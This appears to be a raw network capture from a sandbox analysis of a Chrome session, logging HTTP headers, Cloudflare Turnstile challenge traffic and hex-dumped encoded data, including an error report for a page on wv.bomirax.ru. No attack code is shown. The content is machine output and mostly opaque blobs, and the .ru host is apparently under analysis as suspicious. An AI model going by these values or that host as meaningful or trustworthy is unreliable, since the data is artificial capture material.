                                                                          2025-01-14 21:50:30 UTC1369INData Raw: 68 4b 50 56 74 4c 54 48 42 79 55 6e 64 6d 63 6c 78 45 58 33 70 33 69 30 39 4d 65 6d 6c 4c 64 49 39 55 62 59 6c 52 68 31 6c 6e 6b 4a 31 79 6f 6e 4b 53 64 34 4e 59 6a 32 46 6c 64 48 79 43 70 71 56 6f 67 34 70 77 62 59 6c 2f 6f 4c 65 49 67 36 69 35 6a 72 32 4b 73 36 6c 39 74 62 57 32 6c 4b 61 45 68 38 4b 6a 74 34 71 34 69 63 57 62 70 38 75 4e 6e 49 66 49 78 62 43 34 7a 39 71 73 30 4e 4c 66 6b 74 71 75 30 73 37 69 73 39 62 42 6e 39 50 6b 70 4b 6a 57 35 50 43 2b 33 71 7a 4b 38 73 69 75 38 65 37 79 72 62 7a 73 76 4f 38 42 2b 4d 44 30 76 76 58 37 2f 63 66 66 38 77 44 4d 35 4f 45 4f 43 73 2f 7a 44 41 49 48 43 64 4d 4f 35 74 48 38 31 68 51 54 33 50 51 4f 39 41 55 50 42 51 63 6a 36 43 62 6f 4b 76 6e 6f 37 41 6b 64 4c 79 6e 73 43 41 2f 30 4c 67 73 56 41 7a 55 52 4c
                                                                          Data Ascii: hKPVtLTHByUndmclxEX3p3i09MemlLdI9UbYlRh1lnkJ1yonKSd4NYj2FldHyCpqVog4pwbYl/oLeIg6i5jr2Ks6l9tbW2lKaEh8Kjt4q4icWbp8uNnIfIxbC4z9qs0NLfktqu0s7is9bBn9PkpKjW5PC+3qzK8siu8e7yrbzsvO8B+MD0vvX7/cff8wDM5OEOCs/zDAIHCdMO5tH81hQT3PQO9AUPBQcj6CboKvno7AkdLynsCA/0LgsVAzURL
                                                                          2025-01-14 21:50:30 UTC1369INData Raw: 32 59 46 42 30 68 6c 5a 37 61 6e 57 4a 67 34 79 47 59 6b 71 43 64 49 2b 57 61 49 79 4f 6c 4a 65 4e 57 46 68 65 6e 46 68 6a 6c 61 42 7a 5a 46 71 61 69 71 5a 37 71 5a 79 6d 68 48 75 73 73 34 53 50 62 72 53 73 74 4c 61 54 72 4a 69 32 66 4b 75 78 65 61 2b 45 74 70 71 31 6d 73 71 71 75 70 2b 58 78 4d 69 76 7a 59 69 2f 70 63 53 2f 6a 70 57 4c 73 5a 4b 59 79 38 76 64 6e 5a 65 78 34 61 43 58 35 2b 43 6e 32 4e 50 6a 71 5a 2b 39 37 61 72 64 76 75 6a 41 33 61 6a 59 30 4e 72 4d 74 62 58 48 39 64 75 38 2b 64 54 76 37 65 37 67 2f 41 51 47 76 4f 7a 30 78 38 54 48 41 77 33 4f 2f 51 66 69 42 4d 2f 33 2b 51 37 7a 2f 66 6b 58 39 2b 6e 68 48 4e 7a 67 49 41 63 55 43 69 4c 6e 47 42 58 74 2b 43 55 6f 37 69 73 70 49 78 55 76 39 51 67 74 4b 79 62 34 43 76 6f 38 47 7a 45 42 51 66
                                                                          Data Ascii: 2YFB0hlZ7anWJg4yGYkqCdI+WaIyOlJeNWFhenFhjlaBzZFqaiqZ7qZymhHuss4SPbrSstLaTrJi2fKuxea+Etpq1msqqup+XxMivzYi/pcS/jpWLsZKYy8vdnZex4aCX5+Cn2NPjqZ+97ardvujA3ajY0NrMtbXH9du8+dTv7e7g/AQGvOz0x8THAw3O/QfiBM/3+Q7z/fkX9+nhHNzgIAcUCiLnGBXt+CUo7ispIxUv9QgtKyb4Cvo8GzEBQf
                                                                          2025-01-14 21:50:30 UTC1369INData Raw: 61 6e 57 4b 53 47 4e 2b 65 34 39 4e 68 6e 35 74 54 33 69 54 57 48 47 4e 56 59 74 64 61 35 53 68 64 71 5a 32 6c 6e 75 48 58 4a 4e 6c 61 58 69 41 68 71 71 70 62 49 65 4f 64 4b 75 56 71 70 4b 30 6a 4c 36 57 73 35 6e 43 69 72 79 59 6f 49 36 38 6d 35 50 45 79 36 6d 39 78 4d 69 67 72 4a 71 2b 70 4d 48 42 73 4d 47 56 7a 61 54 4f 73 4d 76 48 73 74 53 39 31 39 32 68 6f 73 2f 6a 34 64 62 70 35 37 2b 38 37 65 2b 76 7a 50 4c 74 79 4e 44 75 72 2f 48 6d 73 76 62 6c 2f 76 33 34 76 74 45 42 2b 4f 50 36 34 63 6a 71 31 66 66 5a 2f 63 33 37 30 41 50 6d 41 75 59 58 39 67 66 72 34 78 45 56 36 65 72 6f 2f 68 7a 36 32 2f 51 42 38 77 54 35 47 2f 45 59 46 4f 77 71 44 76 6b 41 4a 68 73 77 4b 69 6f 30 45 44 44 32 4a 7a 51 30 2b 41 7a 38 50 55 48 2b 4a 44 6f 63 49 42 34 79 50 45 45
                                                                          Data Ascii: anWKSGN+e49Nhn5tT3iTWHGNVYtda5ShdqZ2lnuHXJNlaXiAhqqpbIeOdKuVqpK0jL6Ws5nCiryYoI68m5PEy6m9xMigrJq+pMHBsMGVzaTOsMvHstS9192hos/j4dbp57+87e+vzPLtyNDur/Hmsvbl/v34vtEB+OP64cjq1ffZ/c370APmAuYX9gfr4xEV6ero/hz62/QB8wT5G/EYFOwqDvkAJhswKio0EDD2JzQ0+Az8PUH+JDocIB4yPEE
                                                                          2025-01-14 21:50:30 UTC1369INData Raw: 6f 35 55 6b 56 52 34 5a 48 6c 59 64 49 69 61 6c 46 68 7a 65 6d 43 5a 64 6f 42 75 6f 48 79 5a 64 71 61 56 61 61 65 59 6f 6f 47 6b 63 4c 43 71 6c 72 4b 48 74 5a 75 5a 6b 59 65 34 73 4a 57 4c 6f 35 4b 59 6a 38 44 47 6e 4a 4f 30 78 5a 37 4f 6e 36 32 69 77 63 7a 43 71 4a 36 4e 78 70 53 52 70 39 6a 51 75 61 79 33 32 36 48 59 32 38 47 37 7a 75 54 64 33 74 4c 73 35 62 2f 69 35 75 37 61 76 4e 37 71 34 61 6a 59 34 4e 72 4e 73 2b 37 53 75 64 33 54 41 63 43 38 32 41 62 4f 41 64 33 35 31 67 62 65 2f 51 6e 72 37 4f 4c 2b 79 2b 50 31 43 75 2f 35 39 52 50 7a 35 64 30 59 32 4e 76 32 37 68 41 47 48 75 4d 55 45 65 6e 30 49 53 54 71 4a 79 55 66 45 53 76 78 42 43 6b 6e 49 76 51 47 39 6a 67 58 4c 66 77 39 2b 6a 49 6a 49 67 55 63 52 44 6b 4a 49 43 73 62 44 43 52 4d 54 78 41 6f
                                                                          Data Ascii: o5UkVR4ZHlYdIialFhzemCZdoBuoHyZdqaVaaeYooGkcLCqlrKHtZuZkYe4sJWLo5KYj8DGnJO0xZ7On62iwczCqJ6NxpSRp9jQuay326HY28G7zuTd3tLs5b/i5u7avN7q4ajY4NrNs+7Sud3TAcC82AbOAd351gbe/Qnr7OL+y+P1Cu/59RPz5d0Y2Nv27hAGHuMUEen0ISTqJyUfESvxBCknIvQG9jgXLfw9+jIjIgUcRDkJICsbDCRMTxAo


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.2.44976835.190.80.14434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:29 UTC536OUTOPTIONS /report/v4?s=VBdI44kQ3SIo4qhmrwYt25vhYAXWUuuqAzxzgUS8%2Fp4BtIc7WnRuSYREC%2Fy9FGJSdjPn%2F8uVjalVJ%2F0aYtZkpEh%2F8hb8ughRK8HRDQ2XjGRGYlundQYwvH8cZPfclQ%3D%3D HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Origin: https://wv.bomirax.ru
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:29 UTC336INHTTP/1.1 200 OK
                                                                          Content-Length: 0
                                                                          access-control-max-age: 86400
                                                                          access-control-allow-methods: OPTIONS, POST
                                                                          access-control-allow-origin: *
                                                                          access-control-allow-headers: content-length, content-type
                                                                          date: Tue, 14 Jan 2025 21:50:29 GMT
                                                                          Via: 1.1 google
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.2.44977135.190.80.14434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:30 UTC480OUTPOST /report/v4?s=VBdI44kQ3SIo4qhmrwYt25vhYAXWUuuqAzxzgUS8%2Fp4BtIc7WnRuSYREC%2Fy9FGJSdjPn%2F8uVjalVJ%2F0aYtZkpEh%2F8hb8ughRK8HRDQ2XjGRGYlundQYwvH8cZPfclQ%3D%3D HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 423
                                                                          Content-Type: application/reports+json
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:30 UTC423OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 33 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 77 76 2e 62 6f 6d 69 72 61 78 2e 72 75 2f 5a 31 63 78 6c 39 65 47 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 39 36 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75
                                                                          Data Ascii: [{"age":0,"body":{"elapsed_time":231,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://wv.bomirax.ru/Z1cxl9eG/","sampling_fraction":1.0,"server_ip":"104.21.96.1","status_code":404,"type":"http.error"},"type":"network-error","u
                                                                          2025-01-14 21:50:30 UTC168INHTTP/1.1 200 OK
                                                                          Content-Length: 0
                                                                          date: Tue, 14 Jan 2025 21:50:30 GMT
                                                                          Via: 1.1 google
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.2.449773104.18.94.414434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:30 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1007293128:1736889469:3tFZVfEdHPgvRe4lFj_YIENTci-pgZz_bRcHbKlmagY/9020d7826b0a4252/5oMQoLsc2iOSixT_.cVI8XgYxH9viTIw7cmt1hNSqfE-1736891428-1.1.1.1-EcOzoDxYUj5Kq8T8UJb37UVA.AmT90LxN48yVCYD0ckCIbW51Z93jUI_qQzBlJ5Q HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:31 UTC442INHTTP/1.1 400 Bad Request
                                                                          Date: Tue, 14 Jan 2025 21:50:30 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 14
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          cf-chl-out: 7HNkVbjdf1p3Q7gGDlVKv0vzuE5JNDLpbfl5+/JHLA2+XJT1uuQSLTyNC0dSlf3/8IpafjSGbEVaC2DKOmMnHA==$41g9YgEEanoFZ3hENzuB7g==
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d7939f825590-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2025-01-14 21:50:31 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                          Data Ascii: {"err":100230}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          22192.168.2.449774104.18.95.414434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:31 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/9020d7826b0a4252/1736891429983/4a6352fba8f36f1d421afad8b8981ebc29ca0902dd09b6ab6dd48ce433b246d7/WyIS0zUE02_aIyJ HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g5agr/0x4AAAAAAA2On-0a6Rkou75J/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:32 UTC143INHTTP/1.1 401 Unauthorized
                                                                          Date: Tue, 14 Jan 2025 21:50:31 GMT
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          Content-Length: 1
                                                                          Connection: close
                                                                          2025-01-14 21:50:32 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 53 6d 4e 53 2d 36 6a 7a 62 78 31 43 47 76 72 59 75 4a 67 65 76 43 6e 4b 43 51 4c 64 43 62 61 72 62 64 53 4d 35 44 4f 79 52 74 63 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                          Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gSmNS-6jzbx1CGvrYuJgevCnKCQLdCbarbdSM5DOyRtcAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                          2025-01-14 21:50:32 UTC1INData Raw: 4a
                                                                          Data Ascii: J


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          23192.168.2.449776104.18.95.414434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:32 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/9020d7826b0a4252/1736891429985/QCebGfkPR2Y-Xxm HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g5agr/0x4AAAAAAA2On-0a6Rkou75J/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:32 UTC200INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:32 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 61
                                                                          Connection: close
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d79f1b360f81-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2025-01-14 21:50:32 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 27 00 00 00 2e 08 02 00 00 00 24 ce 97 aa 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: PNGIHDR'.$IDAT$IENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          24192.168.2.449778104.18.95.414434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:33 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1007293128:1736889469:3tFZVfEdHPgvRe4lFj_YIENTci-pgZz_bRcHbKlmagY/9020d7826b0a4252/5oMQoLsc2iOSixT_.cVI8XgYxH9viTIw7cmt1hNSqfE-1736891428-1.1.1.1-EcOzoDxYUj5Kq8T8UJb37UVA.AmT90LxN48yVCYD0ckCIbW51Z93jUI_qQzBlJ5Q HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 32015
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Content-type: application/x-www-form-urlencoded
                                                                          CF-Chl-RetryAttempt: 0
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          CF-Challenge: 5oMQoLsc2iOSixT_.cVI8XgYxH9viTIw7cmt1hNSqfE-1736891428-1.1.1.1-EcOzoDxYUj5Kq8T8UJb37UVA.AmT90LxN48yVCYD0ckCIbW51Z93jUI_qQzBlJ5Q
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://challenges.cloudflare.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g5agr/0x4AAAAAAA2On-0a6Rkou75J/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:33 UTC16384OUTData Raw: 76 5f 39 30 32 30 64 37 38 32 36 62 30 61 34 32 35 32 3d 44 78 67 4b 25 32 62 52 56 74 38 57 78 4e 78 4e 32 78 56 51 56 57 35 39 51 77 30 75 77 6f 67 4e 78 74 4e 5a 4e 58 4c 68 30 4e 46 4e 30 39 56 6a 56 41 62 4e 37 41 4e 56 38 39 4e 2d 4e 6b 45 38 52 74 4e 7a 30 48 4b 52 6b 4e 35 41 48 6a 39 4f 4e 52 78 4e 55 4e 67 78 51 57 77 4b 62 79 53 4e 61 4b 62 33 73 51 37 62 75 67 56 70 58 77 32 4c 4e 6d 4e 42 46 68 67 4d 77 4e 56 77 4e 36 4b 68 6a 74 64 24 52 4e 4e 57 35 4e 44 38 48 24 38 41 4c 68 70 32 4b 4e 5a 77 77 47 69 2b 36 31 53 4e 69 4f 57 75 52 6c 48 51 65 62 35 38 77 4c 56 4c 58 31 37 57 4e 68 62 72 6c 47 32 76 4e 43 37 74 4e 52 62 4e 24 67 67 69 69 7a 36 57 31 31 61 79 68 33 6d 56 39 52 24 41 5a 5a 43 6f 65 35 6e 58 65 70 6d 38 72 6d 6c 68 59 45 73 7a
                                                                          Data Ascii: v_9020d7826b0a4252=DxgK%2bRVt8WxNxN2xVQVW59Qw0uwogNxtNZNXLh0NFN09VjVAbN7ANV89N-NkE8RtNz0HKRkN5AHj9ONRxNUNgxQWwKbySNaKb3sQ7bugVpXw2LNmNBFhgMwNVwN6Khjtd$RNNW5ND8H$8ALhp2KNZwwGi+61SNiOWuRlHQeb58wLVLX17WNhbrlG2vNC7tNRbN$ggiiz6W11ayh3mV9R$AZZCoe5nXepm8rmlhYEsz
                                                                          2025-01-14 21:50:33 UTC15631OUTData Raw: 4f 69 38 51 53 2b 45 46 4f 51 38 4b 31 71 6f 49 6d 4e 52 63 56 30 4e 43 4e 6c 4e 6c 74 4e 6a 4e 74 4c 56 6a 61 32 70 2d 39 51 66 48 6f 59 69 52 70 38 56 75 4e 52 71 45 6e 67 6b 4e 4e 39 52 6a 4e 39 4e 57 39 62 5a 4b 61 4e 56 39 6c 49 4e 39 4e 65 39 4e 32 56 76 4e 59 39 62 67 56 35 4e 30 4c 68 57 56 42 4e 31 4e 56 6a 56 4d 4e 5a 51 51 38 56 6c 6a 2d 74 75 74 56 4a 78 4e 32 62 52 56 48 4e 65 4c 62 55 66 77 67 74 4b 51 6e 30 56 4a 6b 4c 75 78 56 30 4c 37 4e 51 69 53 4b 38 37 4b 44 37 38 74 4e 55 30 4e 39 4e 64 4e 6f 4b 55 30 4e 24 4e 71 77 52 55 56 4a 4e 4b 39 31 49 6c 78 36 57 77 6c 32 4e 41 4e 78 70 32 4a 4e 65 4e 44 71 47 67 68 4b 38 42 32 56 69 4b 59 67 44 4b 67 24 44 63 39 31 76 59 36 53 46 6e 35 4b 4e 33 56 70 4b 74 41 56 4e 4e 49 71 44 4b 55 71 53 77
                                                                          Data Ascii: Oi8QS+EFOQ8K1qoImNRcV0NCNlNltNjNtLVja2p-9QfHoYiRp8VuNRqEngkNN9RjN9NW9bZKaNV9lIN9Ne9N2VvNY9bgV5N0LhWVBN1NVjVMNZQQ8Vlj-tutVJxN2bRVHNeLbUfwgtKQn0VJkLuxV0L7NQiSK87KD78tNU0N9NdNoKU0N$NqwRUVJNK91Ilx6Wwl2NANxp2JNeNDqGghK8B2ViKYgDKg$Dc91vY6SFn5KN3VpKtAVNNIqDKUqSw
                                                                          2025-01-14 21:50:33 UTC322INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:33 GMT
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Content-Length: 26348
                                                                          Connection: close
                                                                          cf-chl-gen: +Ik9yj6YUANB0Hd1V7u7nXgpz2nwPM3sCq2A98B6KhAtdBMyEHWtE1mAspg3ceru$sp9gEOBC3SQ6sZRq+Bkqog==
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d7a379eb42b5-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2025-01-14 21:50:33 UTC1047INData Raw: 58 59 68 6c 67 59 35 6c 61 5a 4f 43 56 57 6d 56 66 6f 35 65 6f 6c 79 55 67 32 4a 6d 70 48 39 6d 61 71 64 6d 70 47 43 72 71 61 52 74 6c 48 4a 73 63 4b 65 6d 68 33 57 6e 71 62 64 37 64 5a 4b 74 67 71 35 2f 66 6f 57 7a 77 59 4b 46 6f 62 33 4c 69 34 47 65 76 5a 4c 4f 6a 38 36 55 6e 39 61 73 70 4b 57 71 79 5a 36 66 6d 39 6d 69 6c 64 33 6b 6f 4c 69 6d 34 4b 54 62 36 61 4f 74 74 2b 57 72 77 74 53 79 37 62 44 6e 35 73 75 31 2b 74 50 37 78 67 44 57 37 62 2f 44 76 37 7a 43 42 64 50 34 30 76 63 4f 42 4d 33 6c 43 67 44 4e 39 4e 49 51 30 41 67 57 32 4e 72 52 42 68 54 74 2f 64 76 37 48 4f 44 69 35 41 41 69 35 43 55 68 42 77 41 6f 4d 43 38 47 4d 67 34 6f 39 43 49 79 42 77 6f 78 49 7a 45 6f 39 43 63 67 44 6a 30 73 45 69 55 79 42 53 49 58 53 7a 51 67 44 43 6b 34 54 67 4d
                                                                          Data Ascii: XYhlgY5laZOCVWmVfo5eolyUg2JmpH9maqdmpGCrqaRtlHJscKemh3Wnqbd7dZKtgq5/foWzwYKFob3Li4GevZLOj86Un9aspKWqyZ6fm9mild3koLim4KTb6aOtt+WrwtSy7bDn5su1+tP7xgDW7b/Dv7zCBdP40vcOBM3lCgDN9NIQ0AgW2NrRBhTt/dv7HODi5AAi5CUhBwAoMC8GMg4o9CIyBwoxIzEo9CcgDj0sEiUyBSIXSzQgDCk4TgM
                                                                          2025-01-14 21:50:33 UTC1369INData Raw: 63 64 70 39 6f 67 4a 5a 31 6f 4a 6c 71 72 34 39 77 68 62 4f 76 69 5a 65 7a 71 61 32 4e 6e 4b 61 76 6b 61 43 71 6e 5a 57 6b 72 70 47 5a 71 4b 6e 4c 6e 61 79 74 78 34 2b 51 6b 59 33 4b 74 4d 75 7a 75 4e 69 31 30 63 79 6d 71 5a 43 7a 32 4c 50 44 75 61 44 68 76 37 75 6a 70 61 4c 68 74 65 36 6e 31 2b 7a 6d 35 76 43 39 36 73 6a 6e 38 39 72 77 79 4c 65 38 2f 62 76 67 2f 50 4b 38 31 75 48 39 39 76 6e 64 41 76 72 38 43 38 6a 4a 79 67 49 47 42 41 54 79 44 4f 6a 79 44 75 37 74 2b 64 77 65 46 67 4c 74 4a 42 62 67 38 53 67 57 35 50 58 69 46 75 59 49 36 2f 76 70 36 43 2f 70 4c 43 38 79 4e 44 44 35 4e 2f 59 58 4e 2f 77 70 50 53 34 37 2b 66 30 5a 41 7a 64 41 50 52 34 35 4c 69 41 73 49 41 70 47 43 54 77 4e 50 78 4e 48 49 6b 73 61 4d 31 30 72 54 6b 78 4d 49 6c 31 52 4f 47
                                                                          Data Ascii: cdp9ogJZ1oJlqr49whbOviZezqa2NnKavkaCqnZWkrpGZqKnLnaytx4+QkY3KtMuzuNi10cymqZCz2LPDuaDhv7ujpaLhte6n1+zm5vC96sjn89rwyLe8/bvg/PK81uH99vndAvr8C8jJygIGBATyDOjyDu7t+dweFgLtJBbg8SgW5PXiFuYI6/vp6C/pLC8yNDD5N/YXN/wpPS47+f0ZAzdAPR45LiAsIApGCTwNPxNHIksaM10rTkxMIl1ROG
                                                                          2025-01-14 21:50:33 UTC1369INData Raw: 66 71 36 6c 70 61 71 6e 71 37 46 31 70 6d 6d 33 6f 5a 75 56 64 6e 61 59 73 58 36 57 75 63 44 43 77 4b 4f 46 77 34 4f 36 77 4d 61 4b 68 4a 37 4f 69 36 72 4d 31 61 32 31 7a 4d 47 6f 74 38 2f 46 32 4d 36 5a 7a 38 76 67 33 63 57 2f 33 65 4b 6e 78 74 2f 4d 79 38 76 6a 30 4f 37 77 30 39 50 79 31 74 36 7a 38 39 6a 79 73 2f 4c 65 38 39 4c 36 41 77 4c 59 41 75 44 36 76 2f 51 44 36 4e 51 43 39 66 6f 52 35 39 33 4c 36 4f 72 2b 38 39 51 50 41 76 67 62 46 67 6a 75 47 78 6e 66 39 75 49 41 42 68 6e 6a 4a 41 6b 6b 44 65 55 57 49 79 4d 66 47 67 45 77 43 42 34 7a 4f 52 41 47 38 77 6b 54 4a 78 7a 38 4f 69 77 52 4c 7a 6f 75 4f 7a 56 44 53 30 6f 68 4f 78 6b 4b 53 77 67 39 53 6c 46 55 55 55 73 4b 45 7a 49 37 45 69 67 64 54 6b 41 2b 55 69 73 7a 4e 47 59 6c 51 56 31 6a 58 7a 74
                                                                          Data Ascii: fq6lpaqnq7F1pmm3oZuVdnaYsX6WucDCwKOFw4O6wMaKhJ7Oi6rM1a21zMGot8/F2M6Zz8vg3cW/3eKnxt/My8vj0O7w09Py1t6z89jys/Le89L6AwLYAuD6v/QD6NQC9foR593L6Or+89QPAvgbFgjuGxnf9uIABhnjJAkkDeUWIyMfGgEwCB4zORAG8wkTJxz8OiwRLzouOzVDS0ohOxkKSwg9SlFUUUsKEzI7EigdTkA+UiszNGYlQV1jXzt
